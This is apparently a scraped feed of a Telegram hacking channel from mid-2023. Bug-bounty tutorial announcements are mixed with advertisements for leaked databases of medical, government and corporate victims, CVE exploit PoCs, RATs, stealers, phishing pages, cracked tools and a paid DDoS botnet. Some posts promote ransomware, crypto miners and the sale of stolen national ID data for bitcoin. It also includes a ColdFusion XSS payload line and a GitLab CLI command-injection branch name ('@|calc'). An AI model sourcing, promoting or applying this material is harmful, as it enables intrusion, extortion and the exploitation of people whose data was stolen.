Here it is 🔥Broken Access Control : 𝙋𝙖𝙧𝙩-2 𝙄𝘿𝙊𝙍 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮. 𝙏𝙤𝙥𝙞𝙘𝙨 𝘾𝙤𝙫𝙚𝙧𝙚𝙙:1. What is IDOR? 2. How to Find IDOR Vulnerability🤓3. What is NOT an IDOR issue 👀Please Share your Views 🙏🏻𝙇𝙞𝙣𝙠:
2023-07-31 02:15:49
CrackCodes 🇮🇳 pinned «»
2023-07-30 16:56:49
2023-07-30 10:50:10
If Someone Have Tryhackme premium Plz donate to @gamer_op_0 This Guy , he Wants for practice..
2023-07-30 08:51:41
🔰👾CVE-2023-35078 Exploit POC :⚡☣️One-liners for Bug Bounty :🌪️💥007-𝙏𝙝𝙚𝘽𝙤𝙣𝙙 Osint Tool :⚡ALIENFOX FREE CHECKER :⭐⚡Nini Collection Ltd Jewelery Data Leak : | |
2023-07-30 02:45:41
2023-07-29 13:57:17
🏥Health Springs Medical Center Data Leak :📟LightSpeed – Fast Data Extraction Using Sqli :🧮CVE-2023-33802 SumatraPDF 3.4.6 DoS :📌LaravelScraper : | |
2023-07-29 12:22:38𝘽𝙧𝙤𝙠𝙚𝙣 𝘼𝙘𝙘𝙚𝙨𝙨 𝘾𝙤𝙣𝙩𝙧𝙤𝙡 𝙍𝙚𝙚𝙡𝙨 🔥
2023-07-29 09:56:03
So We Don't Take Them Seriously 💩🇵🇰
2023-07-29 05:49:52
𝙍𝙚𝙢𝙞𝙣𝙙𝙚𝙧 ‼️Make sure you watch 𝘽𝙧𝙤𝙠𝙚𝙣 𝙖𝙘𝙘𝙚𝙨𝙨 𝘾𝙤𝙣𝙩𝙧𝙤𝙡 - 𝙋𝙖𝙧𝙩-1. 𝙋𝙖𝙧𝙩 -2 Will release on Monday🔥𝙇𝙞𝙣𝙠:
2023-07-28 15:15:08
📌Weee! – leak :💋 Dating Site Leak :📍KILLSHOT – A Penetration Testing Framework :🪅CVE-2023-29336 Exploit :📌WSPCoerce – PoC to coerce authentication from Windows hosts using MS-WSP : | |
2023-07-28 11:55:23 by:- 👼@II_SUDO_II👼
2023-07-28 05:52:27
𝘽𝙧𝙤𝙠𝙚𝙣 𝘼𝙘𝙘𝙚𝙨𝙨 𝘾𝙤𝙣𝙩𝙧𝙤𝙡 - 𝙊𝙫𝙚𝙧𝙫𝙞𝙚𝙬 ✨𝙇𝙞𝙣𝙠:
2023-07-28 05:44:36 By 👼@II_SUDO_II👼
2023-07-27 14:50:05
📌NINTU PROCUREMENT SOFTWARE Data Leak :📍Malicious PDF Generator :🪅CVE-2023-3390 Exploit : | |
2023-07-27 04:55:51
𝙎𝙩𝙤𝙧𝙚𝙙 𝙓𝙎𝙎 𝙫𝙞𝙖 𝙄𝙢𝙖𝙜𝙚 𝙐𝙥𝙡𝙤𝙖𝙙 𝙞𝙣 𝙎𝙝𝙤𝙥𝙞𝙛𝙮 👜😍For more Bug Bounty Videos please like & Subscribe to our YouTube channel. 𝙇𝙞𝙣𝙠:
2023-07-26 13:09:54
📌CVE-2023-20593 AMD Zen Processor Exploit :📌CVE-2023-35086 POC :📌Cisco SPA112 2-Port Phone Adapters RCE Exploit :📌Kernel Exploits Factory :📌VenomRAT v6.0.3 :📌99 Cents Only Stores Data Leak :📌Fiberlink 210 routers Os Injection Exploit : | |
2023-07-26 06:08:07
2023-07-26 05:05:42
𝙀𝙖𝙨𝙞𝙚𝙨𝙩 𝙄𝙣𝙛𝙤𝙧𝙢𝙖𝙩𝙞𝙤𝙣 𝙙𝙞𝙨𝙘𝙡𝙤𝙨𝙪𝙧𝙚 𝙊𝙣𝙚𝙡𝙞𝙣𝙚𝙧. ✨𝙔𝙤𝙪 𝙘𝙖𝙣 𝙖𝙘𝙘𝙚𝙨𝙨 𝙖𝙡𝙡 𝙊𝙣𝙚𝙡𝙞𝙣𝙚𝙧𝙨 𝙞𝙣 𝙤𝙪𝙧 𝙂𝙞𝙩𝙝𝙪𝙗 𝙍𝙚𝙥𝙤. 𝙇𝙞𝙣𝙠:
2023-07-25 15:30:26
🔰⚡TP-Link TL-WR840N Stack Buffer Overflow DoS POC :💥☣️Apple Safari Integer Overflow POC :💥🌪️AT&T 5 million Leak :👾💥Tracker De Colombia Sas Leak :💥👾🔰Xray 1.9.11 Crack : | |
2023-07-25 11:56:41
2023-07-25 08:27:43
𝘽𝙧𝙚𝙖𝙠𝙞𝙣𝙜 𝙉𝙚𝙬𝙨 ‼️‼️𝙒𝙝𝙖𝙩𝙨𝘼𝙥𝙥 𝘼𝙘𝙘𝙤𝙪𝙣𝙩 𝙘𝙖𝙣 𝙗𝙚 𝙙𝙚𝙖𝙘𝙩𝙞𝙫𝙖𝙩𝙚𝙙 𝙗𝙮 𝙟𝙪𝙨𝙩 𝙨𝙚𝙣𝙙𝙞𝙣𝙜 𝙖𝙣 𝙀𝙢𝙖𝙞𝙡 😨😱... 📧𝙇𝙞𝙣𝙠:𝘾𝙝𝙚𝙘𝙠 𝙩𝙝𝙞𝙨 𝙊𝙪𝙩
2023-07-24 13:12:38
Pak courses 🇵🇰😂Note:- Aaj hi enroll ho jana
2023-07-24 05:30:43
2023-07-24 05:14:14
𝘽𝙧𝙤𝙠𝙚𝙣 𝘼𝙘𝙘𝙚𝙨𝙨 𝘾𝙤𝙣𝙩𝙧𝙤𝙡 - 𝙋𝙖𝙧𝙩 1 ➡️ 𝙋𝙧𝙞𝙫𝙞𝙡𝙚𝙜𝙚 𝙀𝙨𝙘𝙖𝙡𝙖𝙩𝙞𝙤𝙣🔥𝙏𝙤𝙥𝙞𝙘𝙨 𝘾𝙤𝙫𝙚𝙧𝙚𝙙:1. What is Access Control2. What is Broken Control3. Types of Privilege Escalation. 😨4. Practically Showcasing Privilege Escalation. Please Share your Views 🙏🏻. ‼️ 𝙀𝙣𝙙 𝙤𝙛 𝙩𝙝𝙚 𝙫𝙞𝙙𝙚𝙤 𝙄'𝙫𝙚 𝙂𝙞𝙫𝙚𝙣 𝙏𝙞𝙥𝙨 𝙃𝙤𝙬 𝙩𝙤 𝙁𝙞𝙣𝙙 𝙩𝙝𝙚𝙨𝙚 𝙩𝙮𝙥𝙚𝙨 𝙤𝙛 𝘽𝙪𝙜𝙨 ‼️𝙇𝙞𝙣𝙠:
2023-07-24 03:44:08
-> List of Websites Giving free RDP/VPS01)[$] Feedback ~ @CW_ChatBot[$] Join ~ @CyberWallNetwork
2023-07-24 03:44:07
-> 16 FREE HOSTING PROVIDERS IN 20231. https://000webhost.com2. https://Freehostia.com3. https://Jimdo.com4. https://FreeHosting.com5. https://xtreemhost.com6. https://Zymic.com7. https://Byethost.com8. https://110MB.com9. https://AwardSpace.com10. https://1FreeHosting.com11. https://FreeHostingEU.com12. https://Uhostfull.com13. https://50Webs.com14. https://ZettaHost.com15. https://x10hosting.com16.[$] Join ~ @CyberWallNetwork
2023-07-23 18:01:07
Bug Bounty tool Listdnscan https://nmap.orgMasscan Machine https://web.archive.orgwaybackurls… #Osint
2023-07-23 14:31:39
👾🍺Windows11 Exploits :💩💥TCL Chinese Theatres Data Leak :⭐🔰Chrome CVE-2023-2033 PoC :👾💥⚡Cloudpanel 0-day Exploit :☣️⚡WooCommerce Payments: Unauthorized Admin Access Exploit : | |
2023-07-23 10:18:46 Views 🫣✨Watch Now ‼️
2023-07-22 13:30:16
👾🍺Windows11 Exploits :💩💥TCL Chinese Theatres Data Leak :⭐🔰Chrome CVE-2023-2033 PoC :👾💥⚡Cloudpanel 0-day Exploit :☣️⚡WooCommerce Payments: Unauthorized Admin Access Exploit : | |
2023-07-22 08:23:25
2023-07-22 04:05:35
Ram ram 🙏
2023-07-21 14:28:06
🔰👾CVE-2023-3460 - Unauthorized admin access for Ultimate Member plugin POC :🌪️💥SQLiv - Massive SQL Injection Scanner Tool :☣️🌪️Globant Argentina IT Company leak :⭐🔰Equipo_io Data Leak :⚡🌪️550k Thailand ID-Card Data ! | 2023 :⭐👾Sanmina Corporation Leak : | |
2023-07-21 08:49:13
GPT Alternative For BlackHat 🔥📢- Lightning Fast- Unlimited Characters- Privacy Focused- No Limits- Coding- Different AI Models(not free) #infosec #Hacking #GPT #BugBounty #CyberSecurity #bugbountytips
2023-07-21 07:34:41
😈🍹sector Database🍹😈😈 Phone number Database. 😈 Mail Database. 😈 Citizens Database. 😈 Passport Database. 😈 Consumer Database. 😈 France Database.😈 Belgium Database.😈 Italy Database.😈 Iran Database.😈 B2B Database. 😈 Germany Database.😈 Swiss Database.😈 Poland Database.😈 Vietnam Database.😈 Sweden Database.😈 Africa Database😈 Usa Database.😈 China database 😈 Spain Database.😈 Sweden Database.😈 Greece Database.😈 Netherland Database.😈 Colombia Database😈 Usa SSN + Fullz Database😈 484 Big COMPANY Database. 😈 Ukraine Database.😈 India Database😈 Bank database 😈 Unlimited logs private 😈 Australia, china, rassia, etc (golden nearly all countries database)   Free data👇@private_sector_info
2023-07-21 01:42:22
Vps sellers contact @mynk0x00
2023-07-20 04:56:03
𝙐𝙣𝙙𝙚𝙧𝙨𝙩𝙖𝙣𝙙 𝙬𝙝𝙖𝙩 𝙞𝙨 𝙅𝙒𝙏 🧐𝙇𝙞𝙣𝙠:
2023-07-19 14:04:45
ColdFusion XSSPOC:{{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain) Images
2023-07-19 11:03:08
🔰⭐Alcatraz - x64 Binary Obfuscator :💩💥Yunus Emre Institute Turkey Leak :
2023-07-19 06:38:49
𝙃𝙚𝙡𝙥 𝙮𝙤𝙪 𝙩𝙤 𝙚𝙭𝙩𝙧𝙖𝙘𝙩 𝙨𝙚𝙣𝙨𝙞𝙩𝙞𝙫𝙚 𝙞𝙣𝙛𝙤𝙧𝙢𝙖𝙩𝙞𝙤𝙣 𝙛𝙧𝙤𝙢 𝙮𝙤𝙪𝙧 𝙩𝙖𝙧𝙜𝙚𝙩 𝙙𝙤𝙢𝙖𝙞𝙣𝙨😍𝙇𝙞𝙣𝙠:
2023-07-18 19:10:08
2023-07-18 18:27:13
Google Reverse Image Search FixGoogle lens is not too user friendly for investigations. But this tool will help you get back to the old Google Image Search.(in case of problems, upload images to Images
2023-07-18 16:49:35
✅ New Blog is Out 🤙
2023-07-18 15:47:05
⚡💥kasrapaper_ir Data Leak :👾☣️SQL-Login-Bypass Script :💥🔰ShadowForge C2 :🌪️⭐TGSCAN :🔰👾Metasploit Pro 4.22.1 Crack Download : | |
2023-07-18 14:46:51
🔥 KRYPTON – Powerful, reliable, cheap DDoS Service!✔️ IoT Botnet for L4✔️ Private servers for L7✔️ Low prices and huge power✅ Our network consists of SPOOF/RAW/AMP mix, a lot of bypasses, game methods and guarantees High GBits/RPS.💬 PRICES / BUY Images
2023-07-18 05:47:10
350$ Bounty 😍𝘽𝙪𝙜: UNION Based SQL Injection. 𝙇𝙞𝙣𝙠:
2023-07-17 16:21:46
Shodan is offering a lifetime membership upgrade for $5.00 instead of $49.00.The sale lasts until July 17 23:59 UTC: have money for buying this but I don't have any international acceptable Card... So if anyone have then after doing your payment please help us also for getting this...😶🥺Regards :- 👼@lexlegion👼Go and Grab The Opportunity Before it's gone End🌎If you Liked my Post Hit Reaction Here🔥
2023-07-17 15:27:24
The Power of OSINT: Conversations with Dheeraj Speaker - @dheerajydv19 (Founder of @OSINTAmbition)We have broadly discussed the following topics in the conversation -- What is OSINT- Use of OSINT in Cybersecurity- Use of OSINT in criminal investigations- Use of OSINT in real world- OSINT in personal life- How to get started in OSINT the video if you are interested in OSINT, or wanted to learn about it.Join @OSINTAmbition for more amazing talks related to OSINT and for learning about useful tools and techniques for OSINT.
2023-07-17 13:32:47
🔰🌪️TagShelf Data Leak :☣️💥Luna Hotels Data Leak :⚡⭐Atherfield Medical & Skin Cancer Clinic Data Leak :💩💥Ghana National Teaching Council Database Leak 2019 :👾⚡Promptmap - Exploit ChatGpt :☣️👾🔰CVE-2023-20110 Exploit | Cisco Smart Software Manager On-Prem SQL Injection : | |
2023-07-17 04:41:01
𝙊𝘼𝙪𝙩𝙝 𝙈𝙞𝙨𝙘𝙤𝙣𝙛𝙞𝙜𝙪𝙧𝙖𝙩𝙞𝙤𝙣 😎😍𝙄𝙩 𝙞𝙨 𝙧𝙚𝙖𝙡𝙡𝙮 𝙀𝙖𝙨𝙮 𝙩𝙤 𝙀𝙭𝙥𝙡𝙤𝙞𝙩 𝙩𝙝𝙞𝙨 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮.𝙋𝙊𝙎𝙎𝙄𝘽𝙇𝙀 𝘽𝙊𝙐𝙉𝙏𝙔: 500$𝙏𝙤𝙥𝙞𝙘 𝘾𝙤𝙫𝙚𝙧𝙚𝙙:1. What is OAUth? 2. Working of OAuth. 3. OAuth Grant Type. 4. OAuth Test cases 😍 ➡️ Account Takeover ➡️ Open Redirection ➡️ SSRF 𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙝𝙖𝙧𝙚 𝙮𝙤𝙪𝙧 𝙑𝙞𝙚𝙬𝙨 🙏🏻𝙇𝙞𝙣𝙠:
2023-07-16 11:30:25
⚡⭐Arandell Data Leak :🔰💥Mutuelle LMP Leak :☣️💥Sweden University Uppsala Leak :🔰💥Guatemala Military Intelligence Directorate 2023 Leaks :🌪️☣️ShowsOnSale (American concert ticket broker) Data Leak :🔰👾HVNC for Cobalt Strike I Hidden Desktop BOF :💥☣️LolDriverScan :👾☣️Anonymous Stealer : | |
2023-07-15 12:45:25
☣️⭐Nvidia Corporation Leak :👾🔰Rheinmetall Defence Leak :🌪️💩FA station Thailand Leak :💥☣️Invicti Enterprise 23.1 :☣️🌪️CVE-2023-37582 EXPLOIT Apache RocketMQ : | |
2023-07-15 05:39:13
𝙒𝙝𝙖𝙩 𝙞𝙨 𝙅𝙒𝙏? 🧐🤔𝙇𝙞𝙣𝙠:
2023-07-14 14:33:25
Report: Chinese state controlled hackers targeted Pak National Information Technology Board (NITB) to extract info about Pak & Western world relations.WLVN Analysis/Twitter
2023-07-14 14:00:17
🔰👾CVE-2023-3460 - Unauthorized admin access for Ultimate Member plugin POC :🌪️💥SQLiv - Massive SQL Injection Scanner Tool :☣️🌪️Globant Argentina IT Company leak :⭐🔰Equipo_io Data Leak :⚡🌪️550k Thailand ID-Card Data ! | 2023 :⭐👾Sanmina Corporation Leak : | |
2023-07-14 13:58:44
2023-07-14 10:08:03
Payload Separation Confirmed, Chandrayaan-3 has been placed into a Precise Orbit. 🤞 🇮🇳
2023-07-14 00:37:23
2023-07-13 16:49:14
2023-07-13 13:30:34
CrackCodes 🇮🇳 pinned «🌪️⚡250.8 Millions US Citizens Leak : ☣️Malcat (0.9.2 - 2023) Download Free : 💥⚡SatIntel - OSINT Tool For Satellites :…»
2023-07-13 13:22:28
Pakistan News Channel DUNYA TV For SALE.Drop your bids on Instagram DM: pkg__diviBest Bidder will be contacted on 11th August.
2023-07-13 12:39:52
🌪️⚡250.8 Millions US Citizens Leak :☣️Malcat (0.9.2 - 2023) Download Free :💥⚡SatIntel - OSINT Tool For Satellites :💩Pakistan Ministry of Finance Leak :👾⚡CVE-2023-2255 Exploit :☣️🌪️PoC Exploit for CVE-2023-35803 : | |
2023-07-13 06:05:09
2023-07-13 05:08:16
256 $ 𝘽𝙤𝙪𝙣𝙩𝙮 𝙤𝙣 𝘿𝙞𝙨𝙘𝙤𝙪𝙧𝙨𝙚. 😍𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSS𝙑𝙞𝙙𝙚𝙤 𝙋𝙤𝘾:
2023-07-12 10:19:04
🔰⭐Sunrise CBD Leak: ⚡💥CVE-2023-29298 Adobe Poc:🌪️⚡PS5 Kernel Exploit:☣️Anti-kill PHP Trojan Generator : | |
2023-07-12 05:44:38
𝙇𝙖𝙩𝙚𝙨𝙩 𝙉𝙀𝙒𝙎 ‼️‼️𝙷𝚊𝚟𝚎 𝚢𝚘𝚞𝚛 𝚑𝚎𝚊𝚛𝚍 𝚊𝚋𝚘𝚞𝚝 𝗤𝗥 𝗝𝗔𝗖𝗞𝗜𝗡𝗚? 🤔𝙇𝙞𝙣𝙠:
2023-07-11 12:55:56
🔰Hamer Candy Malaysian leak :🔰Mituo China Leak :🔰AdultFilmStarContent_com Leak :🔰CVE-2023-2133 Poc :🔰CVE-2023-36167 Poc :🔰CVE-2023-22906 Qubo Smart Doorbell device Exploit : | |
2023-07-11 11:17:17
CVE-2023-24489Citrix ShareFile RCE🔥POC exploit + parsing#citrix Images
2023-07-11 05:04:05
𝘼𝙙𝙙 𝙩𝙝𝙚𝙨𝙚 𝘿𝙤𝙢𝙖𝙞𝙣 𝙞𝙣 𝙮𝙤𝙪𝙧 𝘽𝙪𝙧𝙥𝙎𝙪𝙞𝙩𝙚 𝙩𝙤 𝙍𝙚𝙢𝙤𝙫𝙚 𝙪𝙣𝙬𝙖𝙣𝙩𝙚𝙙 𝙏𝙧𝙖𝙛𝙛𝙞𝙘 🛠️𝙇𝙞𝙣𝙠:
2023-07-10 15:54:34
Blackhat Money Earning💸 : PART 3Theme/Topic : Silent crypto miner campaignby @devil_anonGet crypter :- miner :- is a silent crypto miner ❓A Silent crypto miner  is a type of malware that attackers place on the computers and devices of unwitting users, allowing them to steal computing power in order to surreptitiously mine for cryptocurrency and build efficient cryptomining schemes in order to make money.Share 🌐and promote🌐@cyberhellcommunity( small tip for those who watch our videos :- before watching any, endeavor to save the video to your media and watch directly on your device video player to improve experience and video quality. )
2023-07-10 15:38:33
💥Kramer Enterprises Leak :💥FHR Electric Data Leak :💥Manjaro LPE 0day root LPE Exploit :💥Rhadamanthys Stealer :
2023-07-10 11:25:12
[SELLING]NADRA official data theft of Pakistan Army and other secret organization affiliated By Pakistan ArmyPakistan’s Ministry of Interior, as well as the National Database and Registration Authority (NADRA), have both refused to take responsibility of an allegedly major data leakage comprising personal and possibly sensitive information of more than 450 million mobile users, causing uproar among members of the Pakistan Army and raising concerns about digital security.DATABASE SIZE : 70 GBNUMBER OF RECORDS : 450 MILLION+PRICE : $800PAYMENT MODE : BTCFor Buy DM : @Cypher9829 Forums Thread :
2023-07-10 10:29:39
🌪️⚡Phemedrone Stealer - The best Stealer Bot :⭐AutoCaptcha tool :☣️Evil QR - Hack Using QR :🔰Chiemtai Mobile Vietnam Leaks :🔰Playbooksports_com leak : | |
2023-07-10 04:43:50
𝙈𝙤𝙨𝙩 𝙄𝙂𝙉𝙊𝙍𝙀𝘿 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮 𝙀𝙭𝙥𝙡𝙖𝙞𝙣𝙚𝙙❗❗𝘽𝙐𝙂: Web Socket Vulnerability 🔌𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙝𝙖𝙧𝙚 𝙮𝙤𝙪𝙧 𝙍𝙚𝙫𝙞𝙚𝙬 🙏🏻. 𝙄𝙩 𝙢𝙤𝙩𝙞𝙫𝙖𝙩𝙚𝙨 𝙢𝙚 🤓𝙇𝙞𝙣𝙠:
2023-07-10 04:38:40
2023-07-09 20:53:50
Lenskart 1 Year Gold Membership Code🔥GLPHP-ACIJ-HCLJMH-4257
2023-07-09 12:47:53
2023-07-09 09:24:18
Anyone want bug hunting and owasp top 10 vulnerabilities tips so visit need to first get signup then login to visit this page. Very awesome content and I bet you that you can't find it at one place on entire internet. It's free.
2023-07-09 08:33:18
2023-07-08 14:20:12
💥Kramer Enterprises Leak :💥FHR Electric Data Leak :💥Manjaro LPE 0day root LPE Exploit :💥Rhadamanthys Stealer :
2023-07-08 11:47:32
2023-07-08 06:17:23
Kya hai bhai ye Matha chakra gaya ye dekhkar
2023-07-07 15:34:43
CVE-2023-3269StackRot Linux kernel privilege escalation vulnerability#linux #lpe
2023-07-06 17:13:07
💥RCE in GitLab's CLI tool Attack scenario:1️⃣Attacker creates a repository. They create a branch named "@|calc".2️⃣To make the attack more convincing, they set this branch as the default branch.3️⃣Victim clones the repository on their machine.4️⃣Victim tries to create an MR using glab mr create --web5️⃣The following command is run: cmd.exe /c "start[title]=%s^&amp;merge_request[description]=%s^&amp;merge_request[source_branch]=%s^&amp;merge_request[target_branch]=@|calc^&amp;merge_request[source_project_id]=%d^&amp;merge_request[target_project_id]=%d".6️⃣The pipe character allows to break out of the URL context and launch calc. Images Images Images
2023-07-06 13:55:48 on The maintenanceWe will be start it after 6 days
2023-07-06 13:52:39
💥GeoServer SQL Injection Vulnerability Analysis (CVE-2023-25157)SQL Injection Vulnerabilities have been found with:💾 PropertyIsLike filter, when used with a String field and any database DataStore, or with a PostGIS DataStore with encode functions enabled💾 strEndsWith function, when used with a PostGIS DataStore with encode functions enabled💾 strStartsWith function, when used with a PostGIS DataStore with encode functions enabled💾 FeatureId filter, when used with any database table having a String primary key column and when prepared statements are disabled💾 jsonArrayContains function, when used with a String or JSON field and with a PostGIS or Oracle DataStore (GeoServer 2.22.0+ only)💾 DWithin filter, when used with an Oracle DataStore🔖CVE-2023-25157 - GeoServer SQL Injection - PoCUsage:python3 <URL> Images Images Images Images Images Images Images Images
2023-07-06 09:54:54
2023-07-06 05:17:58
𝘿𝙤 𝙮𝙤𝙪 𝙠𝙣𝙤𝙬 𝙒𝙝𝙖𝙩 𝙞𝙨 " 𝘿𝙊𝙈 𝘾𝙡𝙤𝙗𝙗𝙚𝙧𝙞𝙣𝙜" ? 🤔🤔𝘾𝙝𝙚𝙘𝙠 𝙩𝙝𝙞𝙨 𝙊𝙪𝙩:
2023-07-05 17:09:36
2023-07-05 05:38:46
𝘾𝙝𝙚𝙘𝙠𝙤𝙪𝙩 𝙉𝙚𝙬 𝙄𝘿𝙊𝙍 𝙏𝙚𝙨𝙩-𝘾𝙖𝙨𝙚𝙨𝙇𝙞𝙣𝙠:
2023-07-05 00:28:44
2023-07-04 18:27:16
2023-07-04 08:13:12
2023-07-03 17:42:34
We are hiring !  Information Security candidates It is a full time job at associate level based out of Pune/Mumbai/Bangalore/Gurugram. Hybrid work model. Opportunity to work with international clients.7 - 9 years of work experience in Information Security, Internal Audit, ISO 27001, Risk Management , IT Security, Systems Audit, Consulting, Network security, Quality systems auditCandidates with ISO 27001 LA, CISA ,MBA IT certificates would be preferred.Must have good communication skills.Must be familiar with Information Security domains like Policies and Procedures, VAPT, Risk Assessment, IS Audits, Network Security, Access controlKnowledge of current trends in Information Technology.Knowledge in information security assessments.Knowledge of Security requirements like ISO/IEC 27001 or SOC1, SOC2.How an Information Security Associate, you will be responsible for Client interaction for information gathering.Assisting team members in Analysing, implementing, and managing the information security for our client(s).Policy and Procedure Preparation.Involvement in information security performance reviews and internal audits of client, etc.Please share your CV to as received
2023-07-03 16:17:32
Searpy - Search Engine Tookit: Desktop Session Stealer : Tires Middle East ( data leak : Exploit : REFUGEE database Leak : (British fitness website) data leak : data Leak : layer 4 and 7 ddos with cloudflare bypass : - SMS-based shell : Hazza Bin Zayed Al Nahyan office data leak : Of Industrial Economics data leak :
2023-07-03 12:38:06
Blackhat Money Earning💸 : PART 2Theme/Topic :- Hacking and Selling Website DatabasesForum Post on SQLI:- HereSQL Injection Tutorial :- @devil_anonWhat is a database Attack❓A database-specific threat involves the use of arbitrary non-SQL and SQL attack strings into database queries. Typically, these are queries created as an extension of web forms, or received via HTTP requests. Any database system could be vulnerable to these attacks, if developers do not adhere to secure coding practices, and if the organization does not carry out regular vulnerability testing.Share 🌐and promote🌐@cyberhellcommunity
2023-07-03 09:49:04
364.64 Gb data uploading soon Share and support mateShare link fast 😍😊
2023-07-03 05:44:36
2023-07-03 05:14:15
𝕋𝕆ℙ𝕀ℂ: 𝙒𝙚𝙗-𝘾𝙖𝙘𝙝𝙚 𝙋𝙤𝙞𝙨𝙤𝙣𝙞𝙣𝙜. 💉💻1. How Caching Works? 2. Things to analyze during Caching3. How to Exploit 𝙒𝙚𝙗 𝘾𝙖𝙘𝙝𝙚 𝙋𝙤𝙞𝙨𝙤𝙣𝙞𝙣𝙜. 🄶🄾🄾🄳 🄽🄴🅆🅂 🄵🄾🅁 🄾🅄🅁 🄲🄾🄼🄼🅄🄽🄸🅃🅈🥳𝙄𝙣 𝙩𝙝𝙚 𝙡𝙖𝙨𝙩 𝙤𝙛 𝙑𝙞𝙙𝙚𝙤. 𝙇𝙞𝙣𝙠:
2023-07-02 17:44:03
FIND MY PHONE├Apple└GoogleGEOLOGGERS├seeker├trape ├TrackUrl├Bigbro├r4ven├ngrok└iploggerTELEGRAM SPOOFING├Telegram Nearby Map├Telegram Trilateration└GeogramintADINT├Yandex├Google└Mytarget Images
2023-07-02 17:38:33
Haha Very Nice 😎No matter where you hide Indian Security Agencies will find you 🇮🇳🔥
2023-07-02 14:38:39
Jo soch rahe ho unki hi baat ho rahi hai
2023-07-02 10:00:07
2023-07-02 08:20:59
📟DataLeak:📌Asia Vital Components Leak :📌poskok_info Data Leak :📌Geotecsacr Digital Marketing Agency Leak :📌DarkForum Leak :📌Russian Champion Tennis Club in Tomsk Leak :🧮Exploits:📌Lightdash Exploit (CVE-2023-35844) :📌CVE-2023-33140 OneNote Exploit :📌CVE-2023-34840 XSS POC OF angular-ui-notification :⚙️Tools:📌CrackMapExec :📌SAFIREFUZZ - Same-Architecture Firmware Rehosting and Fuzzing :📌PwnDoc-ng - Pentest Report Generator :📌VulnX - An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms :📌Network Signal Guru APK :📌Google CTF :🦠Rootkit ANd RAT:📌888 RAT New Version 2023 ( 1.2.6 Full Setup ) For Lifetime :📌reveng_rtkit Rootkit :
2023-07-02 00:11:04
Meet DarkBERT - AI Model revolutionizing cybersecurity, emerging from the dark recesses of the internet, trained on a massive 2.2 TB of Dark Web data. This video explores how DarkBERT, a sibling to ChatGPT, decodes the secrets, threats, and coded messages, becoming a pivotal tool in cyber threat intelligence. The power of AI is transforming the way we understand the Dark Web and boosting defenses against worldwide cyber threats with DarkBERT.
2023-07-01 18:31:05
2023-07-01 15:34:24
🔱CVE-2023-24488 POC :🔱CVE-2023-28252 POC :🔱Sniffle - Sniffer for Bluetooth 5 and 4.x (LE) :🔱ChromeOS pluginvm arbitrary chmod 777 :🔱Akira Ransomware Decryptor Software :🔱CVE-2023-27997 FortiGate SSL VPN Detector :🔱TomcatBackdoorPoC :
2023-07-01 13:40:06
Say GoodBye to Struggle for Sharing File. Now Use Telegram to also share files to one who doesn't use Telegram with our new bot@tg_direct_download_botJust give it a try 😊
2023-06-30 13:49:00
🔐DATALEAKS:📌Social Security Administration USA ( Leak :📌Electrical4all ( UK Data Leak :📌AuraXR (Mexican 'extended reality' company) DATA Leak :📌QWERT SYSTEM (South Korean POS systems) Leak :📌Telstra MyRewards (Australian rewards/coupon service) Data Leak :📌DoctorAki (Colombian health website) Data Leak :📌NovaPay data leak :📌3S Castle Real Estate ( Data Leak :🧮Exploits: 📌CVE-2023-34843 POC Traggo/server :📌CVE-2023-2982 Exploit WordPress Social Login and Register Plugin :🛠Tools:📌ATSCAN SCANNER - Advanced dork Search & Mass Exploit Scanner :📌Decrypt FortiManager configuration secrets (CVE-2020-9289) :📌NoMoreCookies - Browser Protector against various Stealers :🐀RAT:📌Everspy v1.1 Rat :🫥SCAMPAGE:📌Bellco Credit Union Scampage :
2023-06-30 05:59:59
2023-06-29 13:27:45
❔Dataleaks:🪅ABC Seamless Data leak :🪅McDonald's Data Leaked 2023 :❄️Exploit:🪅CVE-2023-26258-ArcServe RCE Exploit :🐁Rats ANd Tools:🪅Malwoverview - Malware Analysis Tool :🪅EggShell - iOS/macOS/Linux Remote Administration Tool :🪅Villain C2 Framework :🪅Meta BugBounty - Collection of Facebook Bug Bounty Writeups :🫥ScamPage:🪅Banco Continental Private Phishing page :
2023-06-29 12:04:01
Blackhat Money Earning💸 : PART 1Theme/Topic :- RansomwaresForum Post :- HereHow to setup ransomwares :- one here :- @devil_anonWhat are Ransomwares ❔In simple terms, A ransomware is a type of malicious software, or malware, that prevents you from accessing your computer files, systems, or networks and demands you pay a ransom for their return.Share🌐 and promote ❤️🌐@cyberhellcommunity
2023-06-29 07:58:37
2023-06-29 06:19:38
𝙈𝙚𝙢𝙤𝙧𝙮 𝘿𝙪𝙢𝙥 & 𝙀𝙣𝙫 𝘿𝙞𝙨𝙘𝙡𝙤𝙨𝙪𝙧𝙚 𝙪𝙨𝙞𝙣𝙜 𝙎𝙝𝙤𝙙𝙖𝙣 🔥Access Oneliner in the Given Tweet. 𝙇𝙞𝙣𝙠:
2023-06-29 04:18:30
Say No to Animal Killings.Celebrate this Eid without slaying goats.Goat Lives Matter tooJai shree ram (Happy Eid 🙏)
2023-06-28 18:30:35
2023-06-28 16:54:10
CrackCodes 🇮🇳 pinned «📟DataLeak: 📌Asia Vital Components Leak : 📌poskok_info Data Leak : 📌Geotecsacr Digital Marketing Agency Leak : https://www.system…»
2023-06-28 16:05:35
📟DataLeak:📌Asia Vital Components Leak :📌poskok_info Data Leak :📌Geotecsacr Digital Marketing Agency Leak :📌DarkForum Leak :📌Russian Champion Tennis Club in Tomsk Leak :🧮Exploits:📌Lightdash Exploit (CVE-2023-35844) :📌CVE-2023-33140 OneNote Exploit :📌CVE-2023-34840 XSS POC OF angular-ui-notification :⚙️Tools:📌CrackMapExec :📌SAFIREFUZZ - Same-Architecture Firmware Rehosting and Fuzzing :📌PwnDoc-ng - Pentest Report Generator :📌VulnX - An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms :📌Network Signal Guru APK :📌Google CTF :🦠Rootkit ANd RAT:📌888 RAT New Version 2023 ( 1.2.6 Full Setup ) For Lifetime :📌reveng_rtkit Rootkit :
2023-06-28 12:31:24
